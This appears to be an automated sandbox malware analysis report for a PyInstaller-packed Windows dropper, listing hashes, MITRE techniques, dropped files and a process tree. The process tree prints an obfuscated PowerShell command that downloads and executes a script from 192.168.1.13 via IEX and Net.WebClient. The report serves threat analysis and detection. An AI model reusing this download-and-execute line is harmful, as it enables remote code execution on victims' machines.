f974131c828bce47dc4ac13f200a2720adf2270f40d871daf24204f499ca3cd8

Analysis

max time kernel
167s
max time network
183s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
29-12-2023 18:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

010bf8fe8128591c079451129cc006ae.exe
Size

6.8MB
MD5

010bf8fe8128591c079451129cc006ae
SHA1

d741d589fd196a7edf54cc5ffbdfcc821b491d62
SHA256

f974131c828bce47dc4ac13f200a2720adf2270f40d871daf24204f499ca3cd8
SHA512

f25050da99397aeb707ca3c51670abe8c7927d048ff8a08f6d2a17df066aff2778eac0760ff5f1caf641d5feb67f4ff4df64eb04bcd819ae69c11b7fb7db87f1
SSDEEP

98304:4e3lN+zl7pDS7iPttNrRMRCJhH/YikuZrzXg0CSvITM5t6jicXx4vRM:L33+TZRMRSp/YR4XgIbYLXx4q

Score

10^/10

pyinstaller

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://192.168.1.13/connect

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	010bf8fe8128591c079451129cc006ae.exe

Executes dropped EXE 2 IoCs

pid	Process
1744	power.exe
4764	power.exe

Loads dropped DLL 6 IoCs

pid	Process
4764	power.exe
4764	power.exe
4764	power.exe
4764	power.exe
4764	power.exe
4764	power.exe

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral2/files/0x000500000001e7e8-10.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2832	powershell.exe
2832	powershell.exe
2832	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2832	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3088 wrote to memory of 1744	3088	010bf8fe8128591c079451129cc006ae.exe	97
PID 3088 wrote to memory of 1744	3088	010bf8fe8128591c079451129cc006ae.exe	97
PID 1744 wrote to memory of 4764	1744	power.exe	102
PID 1744 wrote to memory of 4764	1744	power.exe	102
PID 4764 wrote to memory of 1472	4764	power.exe	105
PID 4764 wrote to memory of 1472	4764	power.exe	105
PID 1472 wrote to memory of 2832	1472	cmd.exe	107
PID 1472 wrote to memory of 2832	1472	cmd.exe	107

C:\Users\Admin\AppData\Local\Temp\010bf8fe8128591c079451129cc006ae.exe
"C:\Users\Admin\AppData\Local\Temp\010bf8fe8128591c079451129cc006ae.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3088
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\power.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\power.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1744
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\power.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\power.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:4764
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -command ".('I'+'EX')(&('Ne'+'w-'+('O'+'bje'+'ct')) Net.WebClient).downloadString(('h'+'t'+'tp://'+'192.168.1.13/c'+'onnect'))""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1472
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command ".('I'+'EX')(&('Ne'+'w-'+('O'+'bje'+'ct')) Net.WebClient).downloadString(('h'+'t'+'tp://'+'192.168.1.13/c'+'onnect'))"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2832

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RarSFX0\power.exe

Filesize
6.6MB

MD5
0b725cad4c091327ead1595dd3440650

SHA1
f7dd9c084b72ac1ef67446e143b2bfb8bbfec913

SHA256
a789c59761c4698fdcb5d8e3e82be1080381c363f9d4f2f2c27126dfb39e9978

SHA512
3fb6bc266b64ce00e4951939b4791f494e5705bd7bf314bfa7e9c05e302dfd662eb8d5aed43bd3567fff3914a3e7af2eb5cb4853dcc12024b48d0e3909629174

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI17442\VCRUNTIME140.dll

Filesize
94KB

MD5
18049f6811fc0f94547189a9e104f5d2

SHA1
dc127fa1ff0aab71abd76b89fc4b849ad3cf43a6

SHA256
c865c3366a98431ec3a5959cb5ac3966081a43b82dfcd8bfefafe0146b1508db

SHA512
38fa01debdb8c5369b3be45b1384434acb09a6afe75a50a31b3f0babb7bc0550261a5376dd7e5beac74234ec1722967a33fc55335b1809c0b64db42f7e56cdf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI17442\_ctypes.pyd

Filesize
124KB

MD5
7322f8245b5c8551d67c337c0dc247c9

SHA1
5f4cb918133daa86631211ae7fa65f26c23fcc98

SHA256
4fcf4c9c98b75a07a7779c52e1f7dff715ae8a2f8a34574e9dac66243fb86763

SHA512
52748b59ce5d488d2a4438548963eb0f2808447c563916e2917d08e5f4aab275e4769c02b63012b3d2606fdb5a8baa9eb5942ba5c5e11b7678f5f4187b82b0c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI17442\_socket.pyd

Filesize
78KB

MD5
478abd499eefeba3e50cfc4ff50ec49d

SHA1
fe1aae16b411a9c349b0ac1e490236d4d55b95b2

SHA256
fdb14859efee35e105f21a64f7afdf50c399ffa0fa8b7fcc76dae4b345d946cb

SHA512
475b8d533599991b4b8bfd27464b379d78e51c41f497e81698b4e7e871f82b5f6b2bfec70ec2c0a1a8842611c8c2591133eaef3f7fc4bc7625e18fc4189c914e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI17442\base_library.zip

Filesize
763KB

MD5
c6b38adf85add9f9a7ea0b67eea508b4

SHA1
23a398ffdae6047d9777919f7b6200dd2a132887

SHA256
77479f65578cf9710981255a3ad5495d45f8367b2f43c2f0680fce0fed0e90fb

SHA512
d6abc793a7b6cc6138b50305a8c1cad10fa1628ca01a2284d82222db9bd1569959b05bdf4581d433ff227438131e43eec98bf265e746b17e76b1c9e9e21d447d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI17442\libffi-7.dll

Filesize
32KB

MD5
eef7981412be8ea459064d3090f4b3aa

SHA1
c60da4830ce27afc234b3c3014c583f7f0a5a925

SHA256
f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081

SHA512
dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI17442\python39.dll

Filesize
4.3MB

MD5
1d5e4c20a20740f38f061bdf48aaca4f

SHA1
de1b64ab5219aa6fef95cd2b0ccead1c925fd0d0

SHA256
f8172151d11bcf934f2a7518cd0d834e3f079bd980391e9da147ce4cff72c366

SHA512
9df64c97e4e993e815fdaf7e8ecbc3ce32aa8d979f8f4f7a732b2efa636cfeb9a145fe2c2dcdf2e5e9247ee376625e1fdc62f9657e8007bb504336ac8d05a397

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI17442\select.pyd

Filesize
28KB

MD5
fed3dae56f7c9ea35d2e896fede29581

SHA1
ae5b2ef114138c4d8a6479d6441967c170c5aa23

SHA256
d56542143775d02c70ad713ac36f295d473329ef3ad7a2999811d12151512931

SHA512
3128c57724b0609cfcaca430568d79b0e6abd13e5bba25295493191532dba24af062d4e0340d0ed68a885c24fbbf36b7a3d650add2f47f7c2364eab6a0b5faff

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tbptrf4g.nv1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2832-55-0x0000019E3B0D0000-0x0000019E3B0F2000-memory.dmp

Filesize
136KB

Download
memory/2832-56-0x00007FF99D4E0000-0x00007FF99DFA1000-memory.dmp

Filesize
10.8MB

Download
memory/2832-57-0x0000019E23070000-0x0000019E23080000-memory.dmp

Filesize
64KB

Download
memory/2832-58-0x0000019E23070000-0x0000019E23080000-memory.dmp

Filesize
64KB

Download
memory/2832-59-0x00007FF99D4E0000-0x00007FF99DFA1000-memory.dmp

Filesize
10.8MB

Download
memory/2832-60-0x0000019E23070000-0x0000019E23080000-memory.dmp

Filesize
64KB

Download
memory/2832-61-0x0000019E23070000-0x0000019E23080000-memory.dmp

Filesize
64KB

Download
memory/2832-62-0x0000019E23070000-0x0000019E23080000-memory.dmp

Filesize
64KB

Download
memory/2832-65-0x00007FF99D4E0000-0x00007FF99DFA1000-memory.dmp

Filesize
10.8MB

Download